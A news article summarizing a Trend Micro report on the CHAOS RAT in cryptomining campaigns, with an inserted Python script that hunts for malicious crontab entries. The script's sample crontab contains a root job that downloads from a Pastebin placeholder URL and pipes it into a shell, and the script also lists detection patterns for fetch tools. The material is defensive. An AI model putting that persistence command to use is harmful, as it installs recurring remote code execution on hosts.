Threat actors have been observed using the CHAOS Remote Administrative Tool, an advanced remote access trojan (RAT), to enhance the scope of their operations. Trend Micro, a multinational American-Japanese cyber security software company, explained how it discovered the malware in a recent blog post.
Even though the threat actors were different, the team found that the routines and chain of events were fairly similar. The initial phase saw attackers attempting to eliminate competing malware, security products, and other cloud middleware. This was followed by persistence and payload execution routines; the payload was typically a Monero (XMR) cryptocurrency miner. They also observed capabilities that allowed more sophisticated threats to spread to more devices.
However, in November 2022, they intercepted a threat with a slightly different routine that incorporated the CHAOS Remote Administrative Tool (Trojan.Linux.CHAOSRAT), which is based on an open-source project.
Trend Micro observed that the original flow of terminating competing malware, such as Kinsing, and killing resources that affect cryptocurrency mining performance remained unaltered.
The malware achieves persistence by modifying /etc/crontab, the configuration file of the UNIX cron task scheduler; in this case the added entry re-downloads the malware from Pastebin every 10 minutes. Additional payloads are then downloaded. The main downloader script and the additional payloads are hosted in different locations to keep the campaign active and spreading.
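The crontab persistence pattern described above (a short-interval entry that fetches a script from a paste site and runs it) can be hunted for with a small system-crontab parser. This is an added detection example, not code from the Trend Micro report; the sample crontab content, the paste-site list, the 15-minute threshold and the PLACEHOLDER URL path are all constructed assumptions.

```python
import re

# Constructed sample /etc/crontab content (not taken from the report). The last
# line mimics the described pattern: every 10 minutes, fetch from Pastebin and
# pipe the result into a shell. The URL path is a placeholder.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || run-parts --report /etc/cron.daily
*/10 * * * * root curl -fsSL https://pastebin.com/raw/PLACEHOLDER | sh
"""

# Heuristic indicators (assumed for this example; extend the host list as needed)
PASTE_HOSTS = ("pastebin.com",)
FETCHERS = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba)?sh\b")

def parse_crontab(text):
    """Yield (schedule, user, command) for each job line of a system crontab."""
    for line in text.splitlines():
        line = line.strip()
        # Skip blanks, comments and VAR=value environment lines
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        parts = line.split(None, 6)  # 5 time fields, user, command
        if len(parts) < 7:
            continue
        yield " ".join(parts[:5]), parts[5], parts[6]

def interval_minutes(schedule):
    """Return N for a '*/N' minute field, else None."""
    m = re.fullmatch(r"\*/(\d+)", schedule.split()[0])
    return int(m.group(1)) if m else None

def suspicious_jobs(text, max_interval=15):
    """Return (user, command, reasons) for jobs matching two or more indicators."""
    hits = []
    for schedule, user, cmd in parse_crontab(text):
        reasons = []
        step = interval_minutes(schedule)
        if step is not None and step <= max_interval:
            reasons.append(f"runs every {step} min")
        if FETCHERS.search(cmd):
            reasons.append("fetches remote content")
        if any(host in cmd for host in PASTE_HOSTS):
            reasons.append("paste-site URL")
        if PIPE_TO_SHELL.search(cmd):
            reasons.append("pipes download into a shell")
        if len(reasons) >= 2:
            hits.append((user, cmd, reasons))
    return hits

if __name__ == "__main__":
    for user, cmd, reasons in suspicious_jobs(SAMPLE_CRONTAB):
        print(f"[{user}] {cmd}\n    " + "; ".join(reasons))
```

On a live host, feed it the contents of /etc/crontab and the files under /etc/cron.d to triage entries worth a closer look.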
According to the report, the main server appears to be in Russia, while the command-and-control (C&C) server, which is only used to provide payloads, is most likely in Hong Kong.
On the surface, the incorporation of a RAT into the infection routine of cryptocurrency mining malware might seem relatively minor. However, given the tool's array of functions, and the fact that this evolution shows cloud-based threat actors are still developing their campaigns, both organizations and individuals should stay extra vigilant about security, the report added.